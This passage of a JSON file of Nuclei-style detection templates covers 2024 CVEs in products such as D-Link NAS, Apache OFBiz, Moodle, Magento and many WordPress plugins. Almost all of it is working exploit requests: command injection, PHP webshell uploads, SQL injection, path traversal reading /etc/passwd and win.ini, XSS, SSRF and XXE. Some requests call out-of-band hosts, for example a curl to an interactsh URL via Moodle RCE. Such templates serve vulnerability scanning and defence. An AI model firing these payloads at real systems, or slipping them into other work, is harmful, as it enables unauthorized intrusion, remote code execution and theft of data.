Account","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auth_state>1</auth_state>"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-45507","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/view/StatsSinceStart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatsDecoratorLocation=http%3a//oast.fun/x%3fb64_body%3d{{urlencode(urlencode(base64(xml)))}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["StatsScreens"]}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3673","info":{"name":"Web Directory Free < 1.7.3 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/web-directory-free\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfrom_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td>1970-01-01 00:00:00</td><td class=\"loglevel\">INJECTED</td><td class=\"logsource\">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6926","info":{"name":"Viral Signup <= 2.1 -  SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/viral-signup\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-36683","info":{"name":"PrestaShop productsalert - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_any(tolower(body), \"productsalert\", \"prestashop\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 30s\nPOST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158\n","@timeout: 30s\nPOST /module/productsalert/AjaxProcess HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=5","duration_2>=5"]}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<title>Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41955","info":{"name":"Open Redirect in Login Redirect - MobSF","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /login/?next=//interact.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2024-34982","info":{"name":"LyLme-Spage - Arbitary File Upload","severity":"high"},"requests":[{"raw":["POST /include/file.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------575673989461736\n\n-----------------------------575673989461736\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: image/png\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------575673989461736--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"code\":","\"msg\":","\"url\":","php\"}"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"path","part":"body","group":1,"regex":["\"url\":\"([/a-z_0-9.]+)\""],"internal":true}]},{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{{string}}\" )","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-43425","info":{"name":"Moodle - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n"],"host-redirects":true,"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]},{"raw":["GET /my/courses.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"sesskey","part":"body","internal":true,"group":1,"regex":["\"sesskey\":\"([^\"]+)\""]}]},{"raw":["POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[{\"index\":0,\"methodname\":\"core_course_get_enrolled_courses_by_timeline_classification\",\"args\":{\"offset\":0,\"limit\":0,\"classification\":\"all\",\"sort\":\"fullname\",\"customfieldname\":\"\",\"customfieldvalue\":\"\",\"requiredfields\":[\"id\",\"fullname\",\"shortname\",\"showcoursecategory\",\"showshortname\",\"visible\",\"enddate\"]}}]\n"],"extractors":[{"type":"json","part":"body","name":"courseid","json":[".[].data.courses[0].id"],"internal":true}]},{"raw":["POST /question/bank/editquestion/question.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ninitialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes\n"],"extractors":[{"type":"regex","part":"header","name":"id","group":1,"internal":true,"regex":["&id=([0-9]+)&"]}]},{"raw":["POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page\n"],"extractors":[{"type":"regex","part":"header","name":"rceurl","group":1,"internal":true,"regex":["Location: https?://.*?/question/(.*)&returnurl"]}]},{"raw":["GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"<title>\u4efb\u52a1\u5217\u8868 | Task List</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-48914","info":{"name":"Vendure - Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/../package.json"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\", \"version\", \"main\" ,\"license\")","contains(content_type, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-7714","info":{"name":"AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"],"matchers":[{"type":"dsl","dsl":["regex(\"^true$\", body)","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-3822","info":{"name":"Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<p><script>alert(\\\"document.domain\\\")</script></p>\")"],"condition":"and"}]}]},{"id":"CVE-2024-21644","info":{"name":"pyLoad Flask Config - Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/render/info.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&#39;SECRET_KEY&#39;:","&#39;pyload_session&#39;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-38289","info":{"name":"TurboMeeting - Boolean-based SQL Injection","severity":"critical"},"requests":[{"raw":["POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n","POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["<__Status__>SUCCEED</__Status__>"]},{"type":"word","part":"body_2","words":["<__Status__>FAILED</__Status__>"]}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1209","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","slug\":\"assignment",".pdf\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-44349","info":{"name":"AnteeoWMS < v4.7.34 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /default.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"viewstate","internal":true,"group":1,"regex":["id=\"__VIEWSTATE\" value=\"([/a-zA-Z0-9+=]+?)\""]},{"type":"regex","part":"body","name":"viewstategen","internal":true,"group":1,"regex":["id=\"__VIEWSTATEGENERATOR\" value=\"([A-Z0-9]+)\""]},{"type":"regex","part":"body","name":"eventval","internal":true,"group":1,"regex":["id=\"__EVENTVALIDATION\" value=\"([/a-zA-Z0-9+=]+)\""]}]},{"raw":["POST /default.aspx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server"]}]}]},{"id":"CVE-2024-32964","info":{"name":"Lobe Chat <= v0.150.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /welcome HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"lobechat\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /api/proxy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\n\nhttp://oast.me\n"],"matchers":[{"type":"word","part":"response","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2024-44000","info":{"name":"LiteSpeed Cache <= 6.4.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/litespeed-cache\")"],"internal":true}]},{"raw":["GET /wp-content/debug.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"response","regex":["(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-9593","info":{"name":"Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/time-clock\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2024-6205","info":{"name":"PayPlus Payment Gateway < 6.6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: 